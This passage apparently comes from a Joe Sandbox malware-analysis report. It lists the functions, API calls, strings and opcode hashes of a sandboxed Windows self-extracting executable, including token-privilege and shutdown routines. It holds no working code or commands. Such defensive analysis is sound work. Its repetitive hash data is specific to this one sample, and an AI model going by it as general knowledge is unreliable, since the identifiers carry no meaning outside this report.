                                                            • Part of subcall function 00007FF6975A3B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF6975A3A09), ref: 00007FF6975A3B64
                                                            • Part of subcall function 00007FF6975A3B40: PeekMessageA.USER32 ref: 00007FF6975A3B89
                                                            • Part of subcall function 00007FF6975A3B40: PeekMessageA.USER32 ref: 00007FF6975A3BCD
                                                          • WriteFile.KERNELBASE ref: 00007FF6975A56E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                          • String ID:
                                                          • API String ID: 1084409-0
                                                          • Opcode ID: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                          • Instruction ID: d2dc53c208f2a31555bb5e737841d07bd90c1767f23a25163dfb6a8fcf54c818
                                                          • Opcode Fuzzy Hash: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                          • Instruction Fuzzy Hash: A721A160A0864286EBB88F15E844B75B7A0FF84BF8F148274D92D876E8CF3DD405CB50
                                                          Function 00007FF6975A51BC Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                          • String ID:
                                                          • API String ID: 2018477427-0
                                                          • Opcode ID: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                          • Instruction ID: 1d69f5c080947587b324661d690dff3cf5ac04e84ca79c989327964b1003b7f5
                                                          • Opcode Fuzzy Hash: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                          • Instruction Fuzzy Hash: 2E117C7190C68282F7F84B50A58437566A0FF457F8F1842B0CA4DC6AA5CF7EE884C310
                                                          Function 00007FF6975A7BA8 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CharPrev
                                                          • String ID:
                                                          • API String ID: 122130370-0
                                                          • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                          • Instruction ID: 361202af8b4effbc7edc08c701f9858d038fa079dc0ec75205583d3447b60134
                                                          • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                                          • Instruction Fuzzy Hash: F901F951A0C7C186F7A54F11A84036DBE90E785BF0F5896B0DB69877E5CF2CD8428B50
                                                          Function 00007FF6975A5770 Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                          • Instruction ID: 1110b8b1bbfa7e43174ebe7574242c3e6b03c4ddb1575fcb495b5b69327c3e32
                                                          • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                                          • Instruction Fuzzy Hash: C9F03071608782D2EB6C4F25F68157976B0FB48BE8F144279DA2B9B6C8CF78D581C720

                                                          Non-executed Functions

                                                          Function 00007FF6975A3530 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 174windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                          • String ID: $52352352352$C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 3530494346-1973814555
                                                          • Opcode ID: 02408ae6c79d5afd0dbd1d350f378b5c084b7eca4ab1b8cbcc717c39842157fc
                                                          • Instruction ID: d0cb5bc4b6c3475c7f20b73bb75e483ad6fae6f87ceb4be708bbd0ba2acfa2a8
                                                          • Opcode Fuzzy Hash: 02408ae6c79d5afd0dbd1d350f378b5c084b7eca4ab1b8cbcc717c39842157fc
                                                          • Instruction Fuzzy Hash: 07718761E0C78286FBFC9B25A4143796A91FF8ABE4F5481B0DA4E87699CF3CD505C720
                                                          Function 00007FF6975A12EC Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                          • String ID:
                                                          • API String ID: 2168512254-0
                                                          • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                          • Instruction ID: 0bfa80aa147fb2d9c7b9fa35b75949db5bb66b8b11eeef8e7c38c15ffe0715c1
                                                          • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                          • Instruction Fuzzy Hash: 94515E32A04A51CEEB648F25E4801B97BB4FB4DBE8F4151B5DA0E93758DF38D444CB50
                                                          Function 00007FF6975A1C0C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 2829607268-3733053543
                                                          • Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                          • Instruction ID: d9c4ab4415d805b2d0d7e8e697111864e47174dbc1a0e190de3719c7b0f58729
                                                          • Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                          • Instruction Fuzzy Hash: BB21B472A18A42C7FBB48B60E05577ABBB0FB897A5F409175DA4E87A58DF3CD044CB10
                                                          Function 00007FF6975A8964 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 4104442557-0
                                                          • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                          • Instruction ID: 0ef56db9b027ec402d5299045aa5eb126e8e44ea4b57c5f4bac1da949533b81b
                                                          • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                          • Instruction Fuzzy Hash: A0112122A04B418AEF64DF61E8442A933A4FB497A8F400A34EA6D87754EF7CD5A48350
                                                          Function 00007FF6975A8790 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                          • Instruction ID: ed5859e0b0790e6599a6a30fab1b9835d6f78c5ee04887c3ee0e5099c0a92b06
                                                          • Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                                          • Instruction Fuzzy Hash: 5DB09210E25402C1DA5CAB219C8506113A0FB58364FC008B0C00DC0120DE2CA19A8710
                                                          Function 00007FF6975A70A8 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                          • String ID: "$:$@$RegServer
                                                          • API String ID: 1203814774-4077547207
                                                          • Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                          • Instruction ID: 182d65c87fce8af93dde9e1513999e5c2b15937c8ec142f67aa3809c3b312309
                                                          • Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                          • Instruction Fuzzy Hash: 8B02F221E0C68246FEFC8B2494102B96BA1EFC67F0F5809B5DA5E866B5DF3DE401C760
                                                          Function 00007FF6975A4A60 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 123libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4A86
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4AAA
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4ACA
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4AEC
                                                          • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4B1B
                                                          • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4B3A
                                                          • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4B54
                                                          • FreeLibrary.KERNEL32 ref: 00007FF6975A4BF1
                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6975A35E3), ref: 00007FF6975A4C0D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                          • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                          • API String ID: 1865808269-1731843650
                                                          • Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                          • Instruction ID: 533db199206ea3ce1f5a4cda48f83f94030315c84b4ca11395d5c83ff5852e5f
                                                          • Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                          • Instruction Fuzzy Hash: 27519435A0DB8686EBA88B15B81017A7BA1FF89BE1F4441B4DE4E87794DF3CE844C710
                                                          Function 00007FF6975A4DCC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 159memorywindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                          • String ID: 52352352352$rce.
                                                          • API String ID: 2929476258-3400312407
                                                          • Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                          • Instruction ID: 1200e3f2ed3a0a1dece5c61230686cad2ceb6bb6cdd27d65b0ffce97fb159c98
                                                          • Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                          • Instruction Fuzzy Hash: 5061C121E0878286EBA98B65A4003B96B90FB59BF4F0452B0DE4D87795DF3CE9468720
                                                          Function 00007FF6975A261C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 129registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                          • API String ID: 2659952014-2428544900
                                                          • Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                          • Instruction ID: 1e8c002c5cce4b73a6ab9b1d8438698739d6245af210f83752fc008a648bfa40
                                                          • Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                          • Instruction Fuzzy Hash: 1951B572708A8187EBA48F10E8502BA7BA0FBCABE0F5450B1DA4E87B54DF3CD545C710
                                                          Function 00007FF6975A33F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                          • String ID: 52352352352
                                                          • API String ID: 3785188418-1175956450
                                                          • Opcode ID: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
                                                          • Instruction ID: a2e4f543ea8acbe2bbb2df76784cc3c4fad1ecf173487dfd8a0f5b25c2015d04
                                                          • Opcode Fuzzy Hash: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
                                                          • Instruction Fuzzy Hash: 14314635D086428AEFB85B64E8042B47B91FF8EBB5F5493B0C91E86394DF3CA449C720
                                                          Function 00007FF6975A7F04 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                          • String ID: Control Panel\Desktop\ResourceLocale
                                                          • API String ID: 3346862599-1109908249
                                                          • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                          • Instruction ID: 80d08590e525314d0b08d465d7128bd861026231e9e466cb4af0fea373b0fe63
                                                          • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                          • Instruction Fuzzy Hash: C9519532A08A518AEBB58B24D44017D77E5FB89BA4F8541B1DA6E83794DF3CF544CB10
                                                          Function 00007FF6975A11CC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68librarymemoryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                          • API String ID: 4204503880-1888249752
                                                          • Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                          • Instruction ID: 2d5224d1744c51407947c4238b0e968dd7d88116ff596eb6ce8667f44d451404
                                                          • Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                                          • Instruction Fuzzy Hash: AE312136A08B45CBDB648F16F4441AABBA0FB89B90F455179DE4E83718DF3DE045CB50
                                                          Function 00007FF6975A2834 Relevance: 12.2, APIs: 8, Instructions: 153memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                          • String ID:
                                                          • API String ID: 1051330783-0
                                                          • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                          • Instruction ID: 413cddb3365b7569cd8b643981e03ab366db4572c24bfb84ca8e4b9341764ab9
                                                          • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                          • Instruction Fuzzy Hash: 6C516232B046528EEBB88F1595016B87BA4FB88BF4F545171DE0DA3794DF39E481C720
                                                          Function 00007FF6975A2A6C Relevance: 12.1, APIs: 8, Instructions: 126COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                          • String ID:
                                                          • API String ID: 975904313-0
                                                          • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                          • Instruction ID: ca2f11653a9086da47cbe23a3bc4c8c0b0ce3e81c88587e546a26b2bc2481e7a
